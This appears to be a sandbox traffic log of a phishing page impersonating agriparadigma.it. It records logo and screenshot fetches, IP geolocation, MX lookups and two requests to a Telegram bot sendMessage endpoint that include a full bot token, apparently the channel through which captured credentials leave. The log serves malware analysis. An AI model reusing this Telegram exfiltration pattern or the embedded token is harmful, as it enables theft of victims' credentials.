Source: global trafficHTTP traffic detected: GET /agriparadigma.it HTTP/1.1Host: logo.clearbit.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: */*sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Origin: https://igacorp.conohawing.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://igacorp.conohawing.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /get/width/1200/http://agriparadigma.it HTTP/1.1Host: image.thum.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://igacorp.conohawing.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /json HTTP/1.1Host: ipinfo.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://igacorp.conohawing.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://igacorp.conohawing.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /agriparadigma.it HTTP/1.1Host: logo.clearbit.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /json HTTP/1.1Host: ipinfo.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /resolve?name=agriparadigma.it&type=MX HTTP/1.1Host: dns.googleConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://igacorp.conohawing.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://igacorp.conohawing.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
Source: global trafficHTTP traffic detected: GET /resolve?name=agriparadigma.it&type=MX HTTP/1.1Host: dns.googleConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /bot7569984569:AAHY-ZYlm2R_gaIAe2xifFZ7ATgkuW-WPcs/sendMessage HTTP/1.1Host: api.telegram.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /json HTTP/1.1Host: ipinfo.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://igacorp.conohawing.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://igacorp.conohawing.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /json HTTP/1.1Host: ipinfo.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /bot7569984569:AAHY-ZYlm2R_gaIAe2xifFZ7ATgkuW-WPcs/sendMessage HTTP/1.1Host: api.telegram.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: www.agriparadigma.itConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /wp-includes/css/classic-themes.min.css?ver=1 HTTP/1.1Host: www.agriparadigma.itConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://www.agriparadigma.it/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/contact-form-7/includes/css/styles.css?ver=5.7.7 HTTP/1.1Host: www.agriparadigma.itConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://www.agriparadigma.it/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/cookie-notice/css/front.min.css?ver=2.5.4 HTTP/1.1Host: www.agriparadigma.itConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://www.agriparadigma.it/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /wp-content/uploads/sites/71/tailor/css/frontend.min.css?ver=1.8.2 HTTP/1.1Host: www.agriparadigma.itConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://www.agriparadigma.it/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/wpcf7-redirect/build/css/wpcf7-redirect-frontend.min.css?ver=1.1 HTTP/1.1Host: www.agriparadigma.itConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://www.agriparadigma.it/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/multilingual-press/assets/css/frontend.min.css?ver=1566305675 HTTP/1.1Host: www.agriparadigma.itConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://www.agriparadigma.it/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /wp-content/themes/tentamus/dist/styles/main.css?ver=2001211040 HTTP/1.1Host: www.agriparadigma.itConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://www.agriparadigma.it/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /wp-content/themes/tentamus/dist/fonts/icons.woff HTTP/1.1Host: www.agriparadigma.itConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.agriparadigma.itsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://www.agriparadigma.it/wp-content/themes/tentamus/dist/styles/main.css?ver=2001211040Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /wp-content/themes/tentamus-labor/images/MemberTag.png HTTP/1.1Host: www.agriparadigma.itConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.agriparadigma.it/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /wp-content/uploads/sites/71/2017/06/AGRI_logo_Plain.jpg HTTP/1.1Host: www.agriparadigma.itConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.agriparadigma.it/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /wp-content/themes/tentamus/assets/scripts/amcharts4/core.js HTTP/1.1Host: www.agriparadigma.itConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.agriparadigma.it/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /wp-content/uploads/sites/71/2017/02/HeaderImage_bilacon05.jpg HTTP/1.1Host: www.agriparadigma.itConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.agriparadigma.it/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /wp-content/themes/tentamus/assets/scripts/amcharts4/maps.js HTTP/1.1Host: www.agriparadigma.itConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.agriparadigma.it/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /wp-content/themes/tentamus/assets/scripts/amcharts4/worldLow.js HTTP/1.1Host: www.agriparadigma.itConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.agriparadigma.it/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /wp-content/themes/tentamus-labor/images/MemberTag.png HTTP/1.1Host: www.agriparadigma.itConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /wp-content/uploads/sites/71/2017/06/AGRI_logo_Plain.jpg HTTP/1.1Host: www.agriparadigma.itConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /rules/other-Win32-v19.bundle HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /wp-content/themes/tentamus/assets/scripts/amcharts4/core.js HTTP/1.1Host: www.agriparadigma.itConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /wp-content/themes/tentamus/assets/fonts/barlow400.woff2 HTTP/1.1Host: www.agriparadigma.itConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.agriparadigma.itsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://www.agriparadigma.it/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=EdtAHUGZ27STYf6&MD=WNDZagzh HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global trafficHTTP traffic detected: GET /wp-content/themes/tentamus/assets/scripts/amcharts4/maps.js HTTP/1.1Host: www.agriparadigma.itConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/lab-finder/lang/locale-it_IT.json?v=1732789977147 HTTP/1.1Host: www.agriparadigma.itConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.agriparadigma.it/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /wp-content/uploads/sites/71/2017/02/AGRI_logo_white.png HTTP/1.1Host: www.agriparadigma.itConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.agriparadigma.it/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/contact-form-7/includes/swv/js/index.js?ver=5.7.7 HTTP/1.1Host: www.agriparadigma.itConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.agriparadigma.it/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /wp-content/uploads/sites/71/2017/02/HeaderImage_bilacon05.jpg HTTP/1.1Host: www.agriparadigma.itConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/lab-finder/labs.json?v=1732789978972 HTTP/1.1Host: www.agriparadigma.itConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.agriparadigma.it/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /rules/rule120608v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120600v4s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120609v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule224902v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120402v21s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /tentamus-agriparadigma-it/wp-content/uploads/sites/71/2017/02/faux-home.png HTTP/1.1Host: www.tentamus.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.agriparadigma.it/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/contact-form-7/includes/js/index.js?ver=5.7.7 HTTP/1.1Host: www.agriparadigma.itConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.agriparadigma.it/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /wp-content/themes/tentamus/assets/scripts/amcharts4/worldLow.js HTTP/1.1Host: www.agriparadigma.itConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/lab-finder/lang/locale-it_IT.json?v=1732789977147 HTTP/1.1Host: www.agriparadigma.itConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/cookie-notice/js/front.min.js?ver=2.5.4 HTTP/1.1Host: www.agriparadigma.itConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.agriparadigma.it/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /rules/rule120611v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120610v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120614v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120613v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
